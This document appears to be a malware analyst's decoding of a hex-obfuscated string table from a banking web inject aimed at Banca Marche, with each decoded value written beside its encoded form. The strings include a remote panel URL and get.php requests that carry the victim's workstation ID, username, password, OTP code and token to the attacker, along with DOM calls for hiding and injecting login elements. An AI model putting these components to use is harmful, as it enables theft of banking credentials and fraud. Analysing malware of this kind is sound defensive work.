"\x30",   ---> 0
"",
"\x38", ---> 8
"\x37\x37\x37\x33\x33\x33\x37\x37\x37", ---> 777333777
"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6D\x61\x63\x67\x72\x65\x63\x63\x68\x65\x63\x6B\x73\x65\x72\x76\x69\x6E\x67\x2E\x6E\x65\x74\x2F\x73\x65\x63\x75\x72\x65\x70\x61\x6E\x65\x6C\x2F", ---> http://www.macgreccheckserving.net/securepanel/ 
"\x43\x74\x72\x6C\x2B\x41\x6C\x74\x2B\x38",   --->   Ctrl+Alt+8
"\x63\x6C\x6F\x73\x65",  ---> close
"\x64\x69\x61\x6C\x6F\x67", ---> dialog
"\x23\x69\x6E\x6A\x65\x63\x74",  ---> #inject
"\x64\x69\x73\x70\x6C\x61\x79", ---> display
"\x73\x74\x79\x6C\x65",  ---> style
"\x62\x6F\x74\x74\x6F\x6E\x65\x5F\x61\x63\x63\x65\x64\x69", --->   bottone_accedi
"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64", ---> getElementById
"\x6E\x6F\x6E\x65",    ----> none
"\x69\x6E\x6C\x69\x6E\x65", ---> inline
"\x63\x6C\x69\x63\x6B",   ----> click
"\x61\x64\x64",             ----> add
"\x62\x6F\x74\x74\x6F\x6E\x65\x5F\x61\x63\x63\x65\x64\x69\x32", ----> bottone_accedi2
"\x35",    ---> 5
"\x6F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x30\x4F\x30\x4F\x28\x29",   ---> oOOOOOOO0O0O()
"\x31", ---> 1
"\x74\x65\x78\x74", ---> text
"\x23\x69\x6E\x70\x75\x74\x6C\x61\x62\x65\x6C",  --->   #inputlabel
"\x63\x73\x73",   ---> css
"\x23\x69\x6E\x66\x6F\x32",   ---> #info2
"\x63\x75\x72\x73\x6F\x72",   ---> cursor
"\x62\x6F\x64\x79",          ---> body
"\x64\x65\x66\x61\x75\x6C\x74",  --->  default
"\x62\x6C\x6F\x63\x6B",   --->   block
"\x23\x69\x6E\x66\x6F\x31",   --->   #info1
"\x23\x68\x65\x61\x64\x65\x72\x32",   --->  #header2
"\x23\x68\x65\x61\x64\x65\x72\x31",   --->  #header1
"\x23\x65\x72\x72\x6F\x72\x7A",       --->  #errorz
"\x23\x73\x74\x65\x70\x5F\x63\x61\x70",  ---> #step_cap
"\x23\x66\x69\x6E\x73\x74\x65\x70\x31",  ---> #finstep1
"\x32", ---> 2
"\x39\x39\x39", ---> 999
"\x23\x69\x6E\x66\x6F\x33",  ---> #info3 
"\x23\x68\x65\x6C\x70\x73\x75\x70\x70\x6F\x72\x74",  ---> #helpsupport
"\x6F\x4F\x4F\x4F\x4F\x4F\x4F\x30\x4F\x4F\x30\x4F\x28\x29", ---> oOOOOOO0OO0O()
"\x23\x66\x69\x6E\x73\x74\x65\x70\x30",   ---> #finstep0
"\x44\x69\x67\x69\x74\x61\x72\x65\x20\x69\x6C\x20\x43\x6F\x64\x69\x63\x65\x20\x6E\x75\x6D\x65\x72\x69\x63\x6F\x20\x4F\x54\x50", ---> Digitare il Codice numerico OTP
"\x23\x68\x65\x61\x64\x65\x72\x73\x32",  ---> #headers2
"\x23\x68\x65\x61\x64\x65\x72\x73\x31",  ---> #headers1
"\x77\x61\x69\x74",   ---> wait
"\x68\x65\x61\x64",   ---> head   
"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65",  ---> getElementsByTagName
"\x73\x63\x72\x69\x70\x74",  --->   escript
"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74",   ---> createElement
"\x74\x79\x70\x65",   ---> type
"\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74",  --->   text/javascript
"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64",   --->   appendChild
"\x73\x72\x63",   --->   src
"\x67\x65\x74\x2E\x70\x68\x70\x3F\x62\x6E\x61\x6D\x65\x3D\x62\x61\x6E\x63\x61\x6D\x61\x72\x63\x68\x65\x26\x61\x63\x74\x69\x76\x26\x61\x64\x61\x74\x61\x3D",  ---> get.php?bname=bancamarche&activ&adata=
"\x3B\x70\x6F\x73\x74\x61\x7A\x69\x6F\x6E\x65\x3A\x5E", --->  ;postazione:^
"\x76\x61\x6C\x75\x65", ---> value   
"\x70\x6F\x73\x74\x61\x7A\x69\x6F\x6E\x65",  --->  postazione
"\x3B\x75\x73\x65\x72\x4E\x61\x6D\x65\x3A\x5E", ---> ;userName:^
"\x75\x73\x65\x72\x4E\x61\x6D\x65",   -----> userName
"\x3B\x70\x61\x73\x73\x77\x6F\x72\x64\x3A\x5E", ----> ;password:^
"\x70\x61\x73\x73\x77\x6F\x72\x64",   -----> password
"\x5E\x44\x69\x67\x69\x74\x61\x72\x65\x69\x6C\x43\x6F\x64\x69\x63\x65\x6E\x75\x6D\x65\x72\x69\x63\x6F\x4F\x54\x50\x3A\x5E", ---> ^DigitareilCodicenumericoOTP:^
"\x69\x6E\x6A\x65\x63\x74\x5F\x71\x31",  ---> inject_q1
"\x5E",    --------> ^
"\x6C\x6F\x63\x61\x74\x69\x6F\x6E", ---> location
"\x3B\x54\x6F\x6B\x6B\x65\x6E\x3A\x5E",   ---> ;Tokken:^
"\x26\x72\x6B\x65\x79\x3D",  ---> &rkey=
"\x72\x61\x6E\x64\x6F\x6D",  ---> random
"\x67\x65\x74\x2E\x70\x68\x70\x3F\x62\x6E\x61\x6D\x65\x3D\x62\x61\x6E\x63\x61\x6D\x61\x72\x63\x68\x65\x26\x72\x6B\x65\x79\x3D", ---> get.php?bname=bancamarche&rkey=
"\x6F\x6E\x6C\x6F\x61\x64",  ---> onload
"\x67\x65\x74\x2E\x70\x68\x70\x3F\x62\x6E\x61\x6D\x65\x3D\x62\x61\x6E\x63\x61\x6D\x61\x72\x63\x68\x65\x26\x73\x74\x61\x74\x75\x73\x3D\x35\x26\x72\x6B\x65\x79\x3D",  ---> get.php?bname=bancamarche&status=5&rkey=
"\x73\x6C\x69\x64\x65",   --->  slide
"\x6C\x65\x6E\x67\x74\x68", ---> length
"\x76\x61\x6C",          ---->  val
"\x23\x69\x6E\x6A\x65\x63\x74\x5F\x71\x31",   ---> #inject_q1
"\x66\x6F\x63\x75\x73",   ---> focus    
"\x69\x6E\x66\x6F\x33",   ---> info3
"\x72\x65\x61\x64\x79",   ---> ready
"\x6F\x30\x30\x30\x30\x4F\x30\x30\x30\x28\x29",  ---> o0000O000()
"\x3A",    --------> :
"\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",  ---> innerHTML
"\x64\x54\x69\x6D\x65\x72"];    ------> dTimer

----------------------------------------------------------------------------------------------------------------

Resultado total:

0,  , 8, 777333777, http://www.macgreccheckserving.net/securepanel/ , Ctrl+Alt+8, close,
dialog, #inject, display, style, bottone_accedi, getElementById, none, inline,
click, add, bottone_accedi2, 5, oOOOOOOO0O0O(), 1, text, #inputlabel, css, #info2,
cursor, body, default, block, #info1, #header2, #header1, #errorz, #step_cap, #finstep1, 2,
999, #info3, #helpsupport, oOOOOOO0OO0O(), #finstep0, Digitare il Codice numerico OTP, #headers2, 
#headers1, wait, head, getElementsByTagName, escript, createElement, type, text/javascript,
appendChild, src, get.php?bname=bancamarche&activ&adata=, ;postazione:^,  value, postazione,
;userName:^, userName, ;password:^, password,  ^DigitareilCodicenumericoOTP:^, inject_q1, ^,
 location, ;Tokken:^, &rkey=,  random, get.php?bname=bancamarche&rkey=, onload, 
get.php?bname=bancamarche&status=5&rkey=, slide, length,  val, #inject_q1, focus, info3
ready, o0000O000(), :, innerHTML, dTimer